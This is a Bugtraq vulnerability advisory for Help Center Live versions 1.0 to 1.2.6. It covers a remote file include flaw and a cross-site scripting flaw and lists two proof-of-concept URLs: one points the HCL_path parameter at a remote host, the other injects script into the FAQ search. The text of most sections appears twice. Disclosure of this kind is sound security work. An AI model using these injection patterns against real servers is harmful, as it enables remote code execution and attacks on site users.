Help Center Live Multiple Remote Vulnerabilities
BID:12105
Info
Help Center Live Multiple Remote Vulnerabilities
| Bugtraq ID: | 12105 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 24 2004 12:00AM |
| Updated: | Dec 24 2004 12:00AM |
| Credit: | Discovery is credited to James Bercegay of the GulfTech Security Research Team. |
| Vulnerable: |
Help Center Live Help Center Live 1.2.6 Help Center Live Help Center Live 1.2.5 Help Center Live Help Center Live 1.2.4 Help Center Live Help Center Live 1.2.3 Help Center Live Help Center Live 1.2.2 Help Center Live Help Center Live 1.2.1 Help Center Live Help Center Live 1.2 Help Center Live Help Center Live 1.0 |
| Not Vulnerable: | |
Discussion
Help Center Live Multiple Remote Vulnerabilities
Help Center Live is reported prone to multiple remote vulnerabilities. These issues exist due to insufficient sanitization of user-supplied input. An attacker may exploit these vulnerabilities to execute arbitrary script code on a vulnerable server or a user's browser.
The following specific issues were identified:
The application is reported prone to a remote file include vulnerability. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.
The application is reported prone to a cross-site scripting vulnerability as well.
Help Center Live is reported prone to multiple remote vulnerabilities. These issues exist due to insufficient sanitization of user-supplied input. An attacker may exploit these vulnerabilities to execute arbitrary script code on a vulnerable server or a user's browser.
The following specific issues were identified:
The application is reported prone to a remote file include vulnerability. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.
The application is reported prone to a cross-site scripting vulnerability as well.
Exploit / POC
Help Center Live Multiple Remote Vulnerabilities
An exploit is not required.
The following proof of concept is available:
http://www.example.com/inc/pipe.php?HCL_path=http://www.example.com
http://www.example.com/faq/index.php?find=[CODEGOESHERE]&search=Search
An exploit is not required.
The following proof of concept is available:
http://www.example.com/inc/pipe.php?HCL_path=http://www.example.com
http://www.example.com/faq/index.php?find=[CODEGOESHERE]&search=Search
Solution / Fix
Help Center Live Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Help Center Live Multiple Remote Vulnerabilities
References:
References:
- Critical Vulnerability In Help Center Live (James Bercegay)
- Help Center Live Home Page (Help Center Live)